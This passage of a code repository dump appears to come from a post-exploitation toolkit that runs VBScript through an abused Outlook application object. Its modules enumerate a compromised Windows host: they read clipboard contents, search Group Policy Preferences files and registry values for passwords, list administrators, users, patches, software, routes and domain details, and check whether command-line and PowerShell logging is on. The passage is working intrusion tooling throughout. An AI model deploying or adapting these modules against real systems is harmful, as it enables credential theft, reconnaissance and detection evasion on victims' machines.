udd = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
fah = sh.ExpandEnvironmentStrings("%LOGONSERVER%")
hyf = sh.ExpandEnvironmentStrings("%HOMEPATH%")
If udd = "%USERDNSDOMAIN%" Then
udd = "WORKGROUP"
End If
list_basic = "UserName: " & huj & vbCrLf & "ComputerName: " & gds & vbCrLf & "UserDomain: " & imd & vbCrLF & "UserDNSDomain: " & udd & vbCrLF & "Logon server: " & fah & vbCrLF & "Homepath: " & hyf & vbCrLF & "UserProfile: " & fvy & vbCrLF & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_boottime.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates last boot time using WMI.
It queries LastBootUpTime from Win32_OperatingSystem and converts it to a readable format.
It uses WbemScripting.SWbemLocator
- Query: Select LastBootUpTime from Win32_OperatingSystem
"""
self.entry = 'list_boottime'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_boottime.txt
================================================
Function list_boottime()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select LastBootUpTime from Win32_OperatingSystem")
For Each obj in col
list_boottime = obj.LastBootUpTime
Next
list_boottime = ( Left(list_boottime, 4) _
& "/" & Mid(list_boottime, 5, 2) _
& "/" & Mid(list_boottime, 7, 2) _
& " " & Mid(list_boottime, 9, 2) _
& ":" & Mid(list_boottime,11, 2) _
& ":" & Mid(list_boottime,13, 2))
list_boottime = "Last Boot time: " & list_boottime
End Function
================================================
FILE: functions/enumerate/host/list_clipboard.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Creates a html object and retrieved the content from the clipboard
It uses htmlfile
- ParentWindow.ClipboardData.GetData()
"""
self.entry = 'list_clipboard'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_clipboard.txt
================================================
Function list_clipboard()
On error resume next
Set html = window.external.OutlookApplication.CreateObject("htmlfile")
text = html.ParentWindow.ClipboardData.GetData("text")
list_clipboard = "Clipboard data retrieved: " & vbCrLf & text
End Function
================================================
FILE: functions/enumerate/host/list_environmentvariables.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Lists interesting registry values that might be passwords
or other interesting configuration settings
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumValues
- ConnectServer(root\cimv2).GetDwordValue
- ConnectServer(root\cimv2).GetStringValue
- ConnectServer(root\cimv2).GetExpandedStringValue
- ConnectServer(root\cimv2).GetBinaryValue
- ConnectServer(root\cimv2).GetMultiStringValue
- ConnectServer(root\cimv2).GetQWORDValue
"""
self.entry = 'list_environmentvariables'
self.depends = ['./helperFunctions/Getallregvalues.txt']
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_environmentvariables.txt
================================================
Function list_environmentvariables()
On error resume next
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKLM", "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", 64, 2147483650) & vbCrLF & vbCrLF
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Environment", 64, 2147483649) & vbCrLF & vbCrLF
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Volatile Environment", 64, 2147483649) & vbCrLF
End Function
================================================
FILE: functions/enumerate/host/list_gpp.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.depends = ['./helperFunctions/dir_lister.txt']
self.help = """
Lists Group Policy Preferences files local on host that could contain passwords, configurations or other data.
It looks inside C:\\Windows\\System32\\GroupPolicy\\DataStore\\0\\sysvol\\domain.com\\Policies\\ on the local host for the following files
Groups.xml
Drives.xml
Services.xml
ScheduledTasks.xml
Datasources.xml
Printers.xml
It uses Wscript.Shell
- ExpandEnvironmentStrings
It uses Scripting.FileSystemObject
- FolderExists
- GetFolder
- GetFolder().Files
- GetBaseName
- GetExtensionName
"""
self.entry = 'list_gpp'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_gpp.txt
================================================
Function list_gpp()
On error resume next
Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
polpath = "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\"
If fs.FolderExists(polpath) = True Then
output = "Found " & "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" & vbCrLf
output = output & "Searching for Groups.xml" & vbCrLf & dir_lister(polpath, 0, 4, "xml", "Groups", True, "mb") & vbCrLf
output = output & "Searching for Drives.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Drives", True, "mb") & vbCrLf
output = output & "Searching for Services.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Services", True, "mb") & vbCrLf
output = output & "Searching for ScheduledTasks.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "ScheduledTasks", True, "mb") & vbCrLf
output = output & "Searching for Datasources.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Datasources", True, "mb") & vbCrLf
output = output & "Searching for Printers.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Printers", True, "mb") & vbCrLf
else
output = "Local Policy Folder not found at " & polpath
End If
list_gpp = output
End Function
================================================
FILE: functions/enumerate/host/list_hostsfile.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
This module reads the content of the hostsfile under
C:\windows\system32\drivers\etc\hosts and outputs to the log.
This might reveal specific hosts or other domains etc.
It uses Scripting.FileSystemObject
- OpenTextFile
- OpenTextFile().ReadFile.ReadAll
"""
self.entry = 'list_hostsfile'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_hostsfile.txt
================================================
Function list_hostsfile()
On error resume next
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
If fs.FileExists("C:\Windows\System32\drivers\etc\hosts") = True Then
set ReadFile = fs.OpenTextFile("C:\Windows\System32\drivers\etc\hosts", 1)
content = ReadFile.ReadAll
else
content = "Hosts file not found - WTF!"
End If
list_hostsfile = "C:\Windows\System32\drivers\etc\hosts:" & vbCrLf & content
End Function
================================================
FILE: functions/enumerate/host/list_hotfixes.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Using WMI it enumerates the installed hotfixes.
The Win32_QuickFixEngineering is used (Same as the Powershell cmdlet get-hotfix)
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select * from Win32_QuickFixEngineering
"""
self.entry = 'list_hotfixes'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_hotfixes.txt
================================================
Function list_hotfixes()
On Error Resume Next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_QuickFixEngineering",,48)
list_hotfixes = "HotFixID - Description - InstalledOn" & vbCrLf
For Each objItem in colItems
list_hotfixes = list_hotfixes & objItem.HotFixID & " - " & objItem.Description & " - " & objItem.InstalledOn & vbCrLf
Next
End Function
================================================
FILE: functions/enumerate/host/list_installedapps.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the installed applications.
It enumerates information from the
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\
&
HKLM\\SOFTWARE\\wow6432node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\
registry keys.
It uses WbemScripting.SWbemLocator
- Add
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumKey
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_installedapps'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_installedapps.txt
================================================
Function list_installedapps()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
objLocator.Add "__ProviderArchitecture", 64
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps
apps = "Installed 64bits Applications:" & vbCrLf
For Each strSubkeyapps In arrSubkeysapps
objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName
If appName <> "" Then
objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version
apps = apps & appName & " | " & Version & vbCrLf
End If
Next
apps = apps & vbCrLf & vbCrLf
objLocator.Add "__ProviderArchitecture", 32
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps
apps = apps & "Installed 32bits Applications:" & vbCrLf
For Each strSubkeyapps In arrSubkeysapps
objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName
If appName <> "" Then
objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version
apps = apps & appName & " | " & Version & vbCrLf
End If
Next
list_installedapps = apps & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_installeddotnet.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the installed .NET versions.
Based on MS documentation:
https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed
Lists the installed versions
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumValues
- ConnectServer(root\cimv2).GetDwordValue
- ConnectServer(root\cimv2).GetStringValue
- ConnectServer(root\cimv2).GetExpandedStringValue
- ConnectServer(root\cimv2).GetBinaryValue
- ConnectServer(root\cimv2).GetMultiStringValue
- ConnectServer(root\cimv2).GetQWORDValue
"""
self.entry = 'list_installeddotnet'
self.depends = ['./helperFunctions/Getregvalue.txt']
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_installeddotnet.txt
================================================
Function list_installeddotnet()
On error resume next
list_installeddotnet = "INSTALLED .NET VERSIONS:" & vbCrLf
x64v1 = GetRegValue("HKLM", "Software\Microsoft\.NETFramework\Policy\v1.0\3705", "Install", 64, 2147483650, "STDREGPROV")
x64v11 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v1.1.4322", "Install", 64, 2147483650, "STDREGPROV")
x64v2 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v2.3.50727", "Install", 64, 2147483650, "STDREGPROV")
x64v3 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v3.0\Setup", "InstallSuccess", 64, 2147483650, "STDREGPROV")
x64v35 = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v3.5", "Install", 64, 2147483650, "STDREGPROV")
x64v40C = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v4\Client", "Install", 64, 2147483650, "STDREGPROV")
x64v40F = GetRegValue("HKLM", "Software\Microsoft\NET Framework Setup\NDP\v4\Full", "Install", 64, 2147483650, "STDREGPROV")
x86v1 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\.NETFramework\Policy\v1.0\3705", "Install", 64, 2147483650, "STDREGPROV")
x86v11 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v1.1.4322", "Install", 64, 2147483650, "STDREGPROV")
x86v2 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v2.3.50727", "Install", 64, 2147483650, "STDREGPROV")
x86v3 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v3.0\Setup", "InstallSuccess", 64, 2147483650, "STDREGPROV")
x86v35 = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v3.5", "Install", 64, 2147483650, "STDREGPROV")
x86v40C = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v4\Client", "Install", 64, 2147483650, "STDREGPROV")
x86v40F = GetRegValue("HKLM", "Software\WOW6432Node\Microsoft\NET Framework Setup\NDP\v4\Full", "Install", 64, 2147483650, "STDREGPROV")
if (inStr(1,x64v1,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v1.0 installed" & vbCrLf
end if
if (inStr(1,x64v11,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v1.1 installed" & vbCrLf
end if
if (inStr(1,x64v2,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v2.0 installed" & vbCrLf
end if
if (inStr(1,x64v3,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v3.0 installed" & vbCrLf
end if
if (inStr(1,x64v35,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v3.5 installed" & vbCrLf
end if
if (inStr(1,x64v40C,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v4.0-Client installed" & vbCrLf
end if
if (inStr(1,x64v40F,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X64 .NET Framework v4.0-Full installed" & vbCrLf
end if
if (inStr(1,x86v1,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v1.0 installed" & vbCrLf
end if
if (inStr(1,x86v11,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v1.1 installed" & vbCrLf
end if
if (inStr(1,x86v2,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v2.0 installed" & vbCrLf
end if
if (inStr(1,x86v3,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v3.0 installed" & vbCrLf
end if
if (inStr(1,x86v35,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v3.5 installed" & vbCrLf
end if
if (inStr(1,x86v40C,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v4.0-Client installed" & vbCrLf
end if
if (inStr(1,x86v40F,"Path:",1) = 1) then
list_installeddotnet = list_installeddotnet & "X86 .NET Framework v4.0-Full installed" & vbCrLf
end if
End Function
================================================
FILE: functions/enumerate/host/list_installedpowershell.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the current installed PowerShell versions on the host using registry.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumKey
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_installedpowershell'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_installedpowershell.txt
================================================
Function list_installedpowershell()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
keyps3 = "SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
keyps1 = "SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine"
poshkey = "SOFTWARE\Microsoft\PowerShell"
objReg.EnumKey 2147483650, keyps1, arrSubKeys
objReg.GetStringValue 2147483650, keyps1, "PowerShellVersion", ver2
objReg.EnumKey 2147483650, keyps3, arrSubKeys
objReg.GetStringValue 2147483650, keyps3, "PowerShellVersion", ver3
If IsNull(ver3) Then
If IsNull(ver2) Then
val = "nothing"
Else
val = ver2
End If
Else
val = ver3
End If
list_installedpowershell = "PowerShell Version: " & val & vbCrlf & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_iprouting.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the IP Routing table using the Win32_IP4RouteTable and the Win32_IP4PersistedRouteTable classes.
(Only a few selected attributes is dumped)
Official documentation:
- https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4routetable
- https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wmiiprouteprov/win32-ip4persistedroutetable
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: SELECT * FROM Win32_IP4RouteTable
- Query: SELECT * FROM Win32_IP4PersistedRouteTable
"""
self.entry = 'list_iprouting'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_iprouting.txt
================================================
Function list_iprouting()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_IP4RouteTable",,48)
list_iprouting = "----- DYNAMIC ROUTES -----" & vbCrlf
For Each objItem in colItems
list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf
list_iprouting = list_iprouting & "Interface Index: " & objItem.InterfaceIndex & vbCrlf
list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf
list_iprouting = list_iprouting & "Protocol: " & objItem.Protocol & vbCrlf & vbCrlf
Next
list_iprouting = list_iprouting & "----- PERSISTENT ROUTES -----" & vbCrlf
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_IP4PersistedRouteTable",,48)
For Each objItem in colItems2
list_iprouting = list_iprouting & "Description: " & objItem.Description & vbCrlf
list_iprouting = list_iprouting & "Metric: " & objItem.Metric1 & vbCrlf
Next
End Function
================================================
FILE: functions/enumerate/host/list_localadmins.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the local administrators on the host specified with the inMachine option
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select * from Win32_ComputerSystem
- Query: SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators'
"""
self.entry = 'list_localadmins'
self.depends = []
self.options['host'] = {
"value": ".",
"required": True,
"description": "The machine you want to list local admins from. It defaults to localhost using .",
"handler": quotedstring
}
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_localadmins.txt
================================================
Function list_localadmins()
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer({{host}}, "root\cimv2")
Set colItems1 = objWMIService.ExecQuery( "Select * from Win32_ComputerSystem")
For each objItem in colItems1
MachineName = objItem.Name
Next
toreturn = toreturn & "Administrators Group Membership on Machine : " & MachineName & vbCrLf
toreturn = toreturn & "-----Group Members------" & vbCrLf
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_GroupUser WHERE GroupComponent=""Win32_Group.Domain='" & MachineName & "',Name='Administrators'""")
For Each Path In colItems2
NamesArray = Split(Path.PartComponent,",")
strMemberName = Replace(Replace(NamesArray(1),Chr(34),""),"Name=","")
DomainNameArray = Split(NamesArray(0),"=")
strDomainName = Replace(DomainNameArray(1),Chr(34),"")
If strDomainName <> strComputerName Then
strMemberName = strDomainName & "\" & strMemberName
End If
toreturn = toreturn & strMemberName & vbCrLf
Next
list_localadmins = toreturn & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_localusers.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the local users on the current host
It uses CreateObject("Wscript.Shell")
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: "SELECT * FROM Win32_UserAccount WHERE LocalAccount = True"
"""
self.entry = 'list_localusers'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_localusers.txt
================================================
Function list_localusers()
on error resume next
Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
compname = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
toreturn = toreturn & "Local users on Machine " & compname & " : " & vbCrLf
Set colUsers = objWMIService.ExecQuery("SELECT * FROM Win32_UserAccount WHERE LocalAccount = True")
For Each objUser in colUsers
toreturn = toreturn & objUser.Name & vbCrLf
toreturn = toreturn & "--Description: " & objUser.Description & vbCrLf
toreturn = toreturn & "--Disabled: " & objUser.Disabled & vbCrLf
toreturn = toreturn & "--FullName: " & objUser.FullName & vbCrLf
toreturn = toreturn & "--Lockout: " & objUser.Lockout & vbCrLf
toreturn = toreturn & "--PasswordChangeable: " & objUser.PasswordChangeable & vbCrLf
toreturn = toreturn & "--PasswordExpires: " & objUser.PasswordExpires & vbCrLf
toreturn = toreturn & "--PasswordRequired: " & objUser.PasswordRequired & vbCrLf
toreturn = toreturn & vbCrLf
Next
list_localusers = toreturn
End Function
================================================
FILE: functions/enumerate/host/list_logging.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates status of logging on the host.
It figures out status on logging settings for:
- ProcessCreationIncludeCmdLine
- PowerShell Script Block Logging
- PowerShell Transcript Logging
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumKey
- ConnectServer(root\cimv2).GetDWORDValue
"""
self.entry = 'list_logging'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_logging.txt
================================================
Function list_logging()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
' Cmd Line Process Auditing
keycmdlog = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
objReg.EnumKey 2147483650, keycmdlog, arrSubKeys
objReg.GetDWORDValue 2147483650, keycmdlog, "ProcessCreationIncludeCmdLine_Enabled", isenabled
If IsNull(isenabled) Then
val = "Not Enabled"
Else
If isenabled > 0 Then
val = "Enabled!"
Else
val = "Not Enabled"
End If
End If
cmdaud = "Command Line Proc Arg Auditing: " & val & vbCrlf
'Posh logging
pslog = ""
KeyPSLog1 = "Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
KeyPSLog2 = "Software\Policies\Microsoft\Windows\PowerShell\Transcription"
objReg.EnumKey 2147483650, KeyPSLog1, arrSubkeys
objReg.GetDWORDValue 2147483650, KeyPSLog1, "EnableScriptBlockLogging", scriptlogging
If scriptlogging = 1 Then
pslog = pslog & "PowerShell Script Block Logging: Enabled" & vbCrlf
Else
pslog = pslog & "PowerShell Script Block Logging: Disabled" & vbCrlf
End If
objReg.EnumKey 2147483650, KeyPSLog2, arrSubkeys
objReg.GetDWORDValue 2147483650, KeyPSLog2, "EnableTranscripting", enabletranscripting
objReg.GetDWORDValue 2147483650, KeyPSLog2, "OutputDirectory", outputdirectory
objReg.GetDWORDValue 2147483650, KeyPSLog2, "EnableInvocationHeader", enableinvocationheader
If enabletranscripting = 1 Then
pslog = pslog & "PowerShell Transcription Logging: Enabled" & vbCrlf
Else
pslog = pslog & "PowerShell Transcription Logging: Disabled" & vbCrlf
End If
If outputdirectory = 1 Then
pslog = pslog & "PowerShell Output Directory: Enabled" & vbCrlf
Else
pslog = pslog & "PowerShell Output Directory: Disabled" & vbCrlf
End If
If enableinvocationheader = 1 Then
pslog = pslog & "PowerShell Invocation Header: Enabled" & vbCrlf
Else
pslog = pslog & "PowerShell Invocation Header: Disabled" & vbCrlf
End If
list_logging = cmdaud & vbCrLF & pslog & vbCrLF
End Function
================================================
FILE: functions/enumerate/host/list_mappeddrives.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the mapped drives on the host.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select Name,ProviderName from Win32_MappedLogicalDisk
"""
self.entry = 'list_mappeddrives'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_mappeddrives.txt
================================================
Function list_mappeddrives()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select Name,ProviderName from Win32_MappedLogicalDisk")
drives = "Letter - Provider" & vbCrLf
For Each obj in col
drives = drives & obj.Name & " - " & obj.ProviderName & vbCrLf
Next
list_mappeddrives = drives
End Function
================================================
FILE: functions/enumerate/host/list_networkcardinfo.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all the information from the network cards.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: SELECT * FROM Win32_NetworkAdapterConfiguration
"""
self.entry = 'list_networkcardinfo'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_networkcardinfo.txt
================================================
Function list_networkcardinfo()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
Set colNicConfigs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration",,48)
For Each NIC in colNicConfigs
For Each nicAttribute in NIC.Properties_
if Not (IsNull(nicAttribute.value) OR IsEmpty(nicAttribute.value)) Then
if IsArray(nicAttribute) then
nicResponse = nicResponse & nicAttribute.Name & ": " & Join(nicAttribute, ", ") & vbCrLf
else
nicResponse = nicResponse & nicAttribute.Name & ": " & nicAttribute.value & vbCrLf
end if
end if
Next
Next
list_networkcardinfo = nicResponse
End Function
================================================
FILE: functions/enumerate/host/list_networklogon.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all the information from the Network login profile.
Contains interesting information such as logon restrictions, logon scripts, number of logons and password age
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: SELECT * FROM Win32_NetworkLoginProfile
"""
self.entry = 'list_networklogon'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_networklogon.txt
================================================
Function list_networklogon()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2")
Set colNetLogProfs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkLoginProfile",,48)
For Each NIC in colNetLogProfs
For Each netlogAttribute in NIC.Properties_
if Not (IsNull(netlogAttribute.value) OR IsEmpty(netlogAttribute.value)) Then
if IsArray(netlogAttribute) then
netlogResponse = netlogResponse & netlogAttribute.Name & ": " & Join(netlogAttribute, ", ") & vbCrLf
else
netlogResponse = netlogResponse & netlogAttribute.Name & ": " & netlogAttribute.value & vbCrLf
end if
end if
Next
Next
list_networklogon = netlogResponse
End Function
================================================
FILE: functions/enumerate/host/list_ntdomaininfo.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates information about the domain the computer is joined to using WMI.
Returns unknown if computer is in workgroup.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select * from Win32_NTDomain
"""
self.entry = 'list_ntdomaininfo'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_ntdomaininfo.txt
================================================
Function list_ntdomaininfo()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set colNTDomain = objWMIService.ExecQuery("Select * from Win32_NTDomain")
For Each domain in colNTDomain
For Each domAttribute in domain.Properties_
if Not (IsNull(domAttribute.value) OR IsEmpty(domAttribute.value)) Then
if IsArray(domAttribute) then
ntinfo = ntinfo & domAttribute.Name & ": " & Join(domAttribute, ", ") & vbCrLf
else
ntinfo = ntinfo & domAttribute.Name & ": " & domAttribute.value & vbCrLf
end if
end if
Next
Next
list_ntdomaininfo = ntinfo
End Function
================================================
FILE: functions/enumerate/host/list_officearch.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
